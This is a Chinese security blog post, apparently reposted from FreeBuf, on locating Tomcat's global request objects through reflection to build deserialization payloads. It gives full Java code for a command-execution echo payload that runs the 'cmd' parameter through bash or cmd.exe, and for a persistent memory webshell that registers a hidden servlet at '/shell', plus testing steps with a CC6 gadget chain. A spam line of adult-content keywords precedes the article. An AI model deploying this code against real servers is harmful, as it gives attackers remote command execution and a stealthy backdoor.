自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

從全局變量尋找到Tomcat回顯方式

作者:superLeeH
安全 漏洞
通過這種方式關(guān)注到了org.apache.coyote.AbstractProcessor類中,存在有兩個屬性值名為request / response分別是使用final修飾的org.apache.coyote.Request / org.apache.coyote.Response類型的變量。

前言

對于回顯的獲取主要是在ApplicationFilterChain?類的lastServicedRequest / lastServicedResponse?兩個屬性,是使用的ThreadLocal進行修飾的,并且,在執(zhí)行請求的過程中,通過反射修改屬性值,能夠記錄下當(dāng)前線程的request對象的值。

之后在反序列化利用過程中方便利用ThreadLocal取出對應(yīng)的request進行內(nèi)存馬的注入關(guān)鍵步驟。

這里轉(zhuǎn)而通過尋找全局存儲的request / response進行內(nèi)存馬的注入操作。

正文

如何獲取的回顯

師傅通過這種方式關(guān)注到了org.apache.coyote.AbstractProcessor?類中,存在有兩個屬性值名為request / response?分別是使用final?修飾的org.apache.coyote.Request / org.apache.coyote.Response類型的變量。

image-20221102202506085.png

我們的目標(biāo)是注入一個內(nèi)存馬,這里以上篇一樣的Servlet內(nèi)存馬舉例說明。

對于Servlet內(nèi)存馬,我們需要獲取到對應(yīng)ServletContext?,但是在org.apache.coyote.Request?類中,并沒有直接可以獲取的方法存在,我們可以關(guān)注到該類的setNote方法的實現(xiàn)。

image-20221102202726283.png

這個方法是用來存放私有數(shù)據(jù)的,在其中舉了一個例子,其中描述了對于該類的notes?數(shù)組中的下標(biāo)為1的位置是用來存放的HttpServletRequest?對象的,值得注意的是其中的0-8序號存放的是servlet Container?中的數(shù)據(jù),9-16序號存放的是connector這個組件的數(shù)據(jù)。

因為只要獲取到了HttpServletRequest?對象,也就能夠調(diào)用getServletContext方法獲取我們需要的上下文。

我們可以通過getNote(1)來獲取,

好了,言歸正傳,轉(zhuǎn)到獲取request對象,

在一個Controller調(diào)用過程中,其中的Http11Processor?類是繼承了AbstractProcessor這個類的。

image-20221102203538541.png

所以我們只需要獲取到Http11Processor類對象,我們就能夠成功獲取到我們需要的request對象

目標(biāo)放在調(diào)用Http11Processor之前是否對該對象進行持久化存儲,或者直接點對其中的request對象進行了持久化存儲

image-20221102203804487.png

我們進而關(guān)注到了AbstractProtocol$ConnectionHandler?類中,在調(diào)用process?方法的過程中調(diào)用了register方法對processor對象進行了存儲。

image-20221102204331170.png

傳入的是processor,他到底是什么,我們可以追溯到該方法的開頭,存在有來源。

image-20221102204429536.png

我們可以知道,這個processor對象是獲取的是當(dāng)前的Http11Processor對象,

對于register方法,我們可以跟進一下。

image-20221102204648552.png

首先從processor中獲取了RequestInfo?對象的信息之后調(diào)用了setGlobalProcessor方法。

image-20221102204926999.png

調(diào)用了addRequestProcessor方法進行添加。

image-20221102205118001.png

也即是,將其添加進入了processors這個List對象中,

image-20221102205429353.png

所以現(xiàn)在我們的目的是獲取到AbstractProtocol$ConnectionHandler?類的global?屬性值,也即是獲取到AbstractProtocol這個類對象。

在調(diào)用這一步之后看起,發(fā)現(xiàn)了在CoyoteAdapter#service?方法中,存在有Connector對象的操作。

image-20221102205905726.png

對于Connector對象

image-20221102210101134.png

這是一個connector組件的一個實現(xiàn),

其中存在有一個protocolHandler?屬性,是一個ProtocolHandler類對象。

image-20221102210232734.png

前面我們需要獲取的是AbstractProtocol類對象,同樣是實現(xiàn)了這個接口,

而且于HTTP連接相關(guān)的類都實現(xiàn)了這個接口的,

image-20221102210520949.png

所以我們能夠從該屬性中獲取到我們需要的AbstractProtocol對象值,

現(xiàn)在我們需要獲取的對象就是一個Connector對象,

而對于連接器的創(chuàng)建,在tomcat容器進行啟動的時候,將會調(diào)用setConnector?方法將connector放在service中去,也即是StandardService類對象。

對于StandardService的獲取,我們可以直接從當(dāng)前線程中進行獲取。

image-20221102211439089.png

這樣,一條鏈子進行成了

總結(jié)一下:

StandardService?==>connector?==>Connector.protocolHandler?==>Http11NioProtocol.handler?==>AbstractProtocol$ConnectionHandler.global?==>RequestGroupInfo.processors?==>RequestInfo.req

構(gòu)造回顯內(nèi)存馬

非持久化

這種應(yīng)該也不算是內(nèi)存馬吧,也就是每次發(fā)送發(fā)序列化數(shù)據(jù)的時候,通過利用獲取的request / response進行命令執(zhí)行和回顯。

對于實驗的環(huán)境同樣使用的是前面一樣的環(huán)境 -- 使用springboot搭建的環(huán)境,

我首先創(chuàng)建了一個getField方法方便獲取屬性值。

image-20221102212415649.png

將具體邏輯放在了static代碼塊中。

值得注意的有兩點

在進行connector的篩選中,調(diào)用了getScheme().toLowerCase().contains("http")方法來帥選和http相關(guān)的連接器。

在命令執(zhí)行的位置,通過判斷有無特征來決定是否執(zhí)行命令。

image-20221102213238561.png

完整的實現(xiàn)

// 從線程中獲取類加載器WebappClassLoaderBase
            WebappClassLoaderBase contextClassLoader = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
            // 獲取TomcatEmbeddedContext對象
            Context context = contextClassLoader.getResources().getContext();
            // 從上下文中獲取ApplicationContext對象
            ApplicationContext applicationContext = (ApplicationContext) getField(context, Class.forName("org.apache.catalina.core.StandardContext").getDeclaredField("context"));

            // 從Application中獲取StandardService對象
            StandardService standardService = (StandardService) getField(applicationContext, Class.forName("org.apache.catalina.core.ApplicationContext").getDeclaredField("service"));

            // 從StandardService中獲取Connector數(shù)組
            Connector[] connectors = standardService.findConnectors();
            for (Connector connector : connectors) {
                if (connector.getScheme().toLowerCase().contains("http")) {
                    // 獲取Connector對象的protocolHandler屬性值
                    ProtocolHandler protocolHandler = connector.getProtocolHandler();
                    // 篩選我們需要的Abstract
                    if (protocolHandler instanceof AbstractProtocol) {
                        // 從Http11NioProtocol對象中獲取到handler屬性,也即是AbstractProtocol中的handler屬性,存在有一個getHandler方法可以直接返回
                        // 反射獲取該方法
                        Method getHandler = Class.forName("org.apache.coyote.AbstractProtocol").getDeclaredMethod("getHandler");
                        getHandler.setAccessible(true);
                        AbstractEndpoint.Handler handler = (AbstractEndpoint.Handler) getHandler.invoke(protocolHandler);
                        // 從上面獲取的handler中取出global屬性值
                        RequestGroupInfo global = (RequestGroupInfo) getField(handler, Class.forName("org.apache.coyote.AbstractProtocol$ConnectionHandler").getDeclaredField("global"));
                        // 之后從上面獲取的RequestGroupInfo對象中獲取到processors這個List對象,元素是RequestInfo對象
                        ArrayList processors = (ArrayList) getField(global, Class.forName("org.apache.coyote.RequestGroupInfo").getDeclaredField("processors"));
                        // 遍歷List中的元素
                        for (Object processor : processors) {
                            RequestInfo requestInfo = (RequestInfo) processor;
                            // 獲取對應(yīng)的Request對象
                            org.apache.coyote.Request req = (org.apache.coyote.Request) getField(requestInfo, Class.forName("org.apache.coyote.RequestInfo").getDeclaredField("req"));
                            // 通過不同的請求進行處理
                            if ((req.queryString()).toString().toLowerCase().contains("cmd")) {
                                // 獲取對應(yīng)的Request對象
                                org.apache.catalina.connector.Request request = (org.apache.catalina.connector.Request) req.getNote(1);
                                // 執(zhí)行希望執(zhí)行的命令
                                String cmd = request.getParameter("cmd");
                                String[] cmds = null;
                                if (cmd != null) {
                                    if (System.getProperty("os.name").toLowerCase().contains("win")) {
                                        cmds = new String[] {"cmd.exe", "/c", cmd};
                                    } else {
                                        cmds = new String[] {"/bin/bash", "-c", cmd};
                                    }
                                    java.util.Scanner c = new java.util.Scanner(new ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A");
                                    String o = null;
                                    o = c.hasNext() ? c.next() : o;
                                    c.close();
                                    PrintWriter writer = request.getResponse().getWriter();
                                    writer.println(o);
                                    writer.flush();
                                    writer.close();
                                }
                            }

測試一下

首先通過CC6_plus生成序列化數(shù)據(jù)1.ser

發(fā)送給漏洞端。

image-20221102213721803.png

在訪問路由中添加了一個cmd的GET傳參,最后能夠發(fā)現(xiàn),成功執(zhí)行了的。

持久化

對于持久化也就是真正的內(nèi)存馬實現(xiàn),主要是通過和前面的Tomcat Servlet內(nèi)存馬相結(jié)合的模式,

也即是從request對象中獲取到了ServletContext對象來執(zhí)行惡意邏輯。

完整實現(xiàn)

// 從線程中獲取類加載器WebappClassLoaderBase
            WebappClassLoaderBase contextClassLoader = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
            // 獲取TomcatEmbeddedContext對象
            Context context = contextClassLoader.getResources().getContext();
            // 從上下文中獲取ApplicationContext對象
            ApplicationContext applicationContext = (ApplicationContext) getField(context, Class.forName("org.apache.catalina.core.StandardContext").getDeclaredField("context"));

            // 從Application中獲取StandardService對象
            StandardService standardService = (StandardService) getField(applicationContext, Class.forName("org.apache.catalina.core.ApplicationContext").getDeclaredField("service"));

            // 從StandardService中獲取Connector數(shù)組
            Connector[] connectors = standardService.findConnectors();
            for (Connector connector : connectors) {
                if (connector.getScheme().toLowerCase().contains("http")) {
                    // 獲取Connector對象的protocolHandler屬性值
                    ProtocolHandler protocolHandler = connector.getProtocolHandler();
                    // 篩選我們需要的Abstract
                    if (protocolHandler instanceof AbstractProtocol) {
                        // 從Http11NioProtocol對象中獲取到handler屬性,也即是AbstractProtocol中的handler屬性,存在有一個getHandler方法可以直接返回
                        // 反射獲取該方法
                        Method getHandler = Class.forName("org.apache.coyote.AbstractProtocol").getDeclaredMethod("getHandler");
                        getHandler.setAccessible(true);
                        AbstractEndpoint.Handler handler = (AbstractEndpoint.Handler) getHandler.invoke(protocolHandler);
                        // 從上面獲取的handler中取出global屬性值
                        RequestGroupInfo global = (RequestGroupInfo) getField(handler, Class.forName("org.apache.coyote.AbstractProtocol$ConnectionHandler").getDeclaredField("global"));
                        // 之后從上面獲取的RequestGroupInfo對象中獲取到processors這個List對象,元素是RequestInfo對象
                        ArrayList processors = (ArrayList) getField(global, Class.forName("org.apache.coyote.RequestGroupInfo").getDeclaredField("processors"));
                        // 遍歷List中的元素
                        for (Object processor : processors) {
                            RequestInfo requestInfo = (RequestInfo) processor;
                            // 獲取對應(yīng)的Request對象
                            org.apache.coyote.Request req = (org.apache.coyote.Request) getField(requestInfo, Class.forName("org.apache.coyote.RequestInfo").getDeclaredField("req"));
                            org.apache.catalina.connector.Request request = (org.apache.catalina.connector.Request) req.getNote(1);

                            ServletContext servletContext = request.getServletContext();

                            String name = "xxx";
                            if (servletContext.getServletRegistration(name) == null) {
                                StandardContext o = null;

                                // 從 request 的 ServletContext 對象中循環(huán)判斷獲取 Tomcat StandardContext 對象
                                while (o == null) {
                                    Field f = servletContext.getClass().getDeclaredField("context");
                                    f.setAccessible(true);
                                    Object object = f.get(servletContext);

                                    if (object instanceof ServletContext) {
                                        servletContext = (ServletContext) object;
                                    } else if (object instanceof StandardContext) {
                                        o = (StandardContext) object;
                                    }
                                }

                                //自定義servlet
                                Servlet servlet = new TomcatMemshell1();

                                //用Wrapper封裝servlet
                                Wrapper newWrapper = o.createWrapper();
                                newWrapper.setName(name);
                                newWrapper.setLoadOnStartup(1);
                                newWrapper.setServlet(servlet);

                                //向children中添加Wrapper
                                o.addChild(newWrapper);
                                //添加servlet的映射
                                o.addServletMappingDecoded("/shell", name);

簡單測試一下,

啟動反序列漏洞環(huán)境,

發(fā)送序列化數(shù)據(jù),

image-20221102214213112.png

成功進行反序列化,

image-20221102214235912.png

驗證是否成功注入,

image-20221102214306886.png

成功創(chuàng)建了一個惡意的Servlet。

Ref

https://github.com/Litch1-v/ysoserial/blob/master/src/main/java/ysoserial/payloads/util/Gadgets.java

https://xz.aliyun.com/t/7348

本文作者:superLeeH, 轉(zhuǎn)載請注明來自FreeBuf.COM

責(zé)任編輯:武曉燕 來源: FreeBuf.COM
Tomcat回顯方式
相關(guān)推薦

2023-09-24 23:40:54

Python變量

2010-11-12 10:08:55

SQL Server全

2013-07-25 15:15:26

iOS開發(fā)學(xué)習(xí)iOS全局變量

2013-07-17 16:16:06

Android全局變量定義全局變量Application

2010-03-09 14:12:55

Python全局變量

2013-07-22 14:07:47

2009-11-06 13:28:19

Javascript框

2009-09-24 09:28:00

Scala講座全局變量scala

2009-12-09 17:07:08

PHP unset全局

2010-02-01 14:28:37

Python全局變量

2009-12-04 13:14:19

PHP Global變

2015-01-07 14:41:32

Android全局變量局部變量

2024-05-29 08:49:22

Python全局變量局部變量

2021-02-26 13:42:01

函數(shù)全局變量

2009-12-04 13:31:21

PHP全局變量不能生效

2017-02-08 12:28:37

Android變量總結(jié)

2014-06-23 10:25:12

2010-09-08 17:25:17

SQL全局變量

2011-08-23 13:54:10

LUA全局變量

2017-03-07 13:36:48

源代碼Tomcat開源
點贊
收藏

51CTO技術(shù)棧公眾號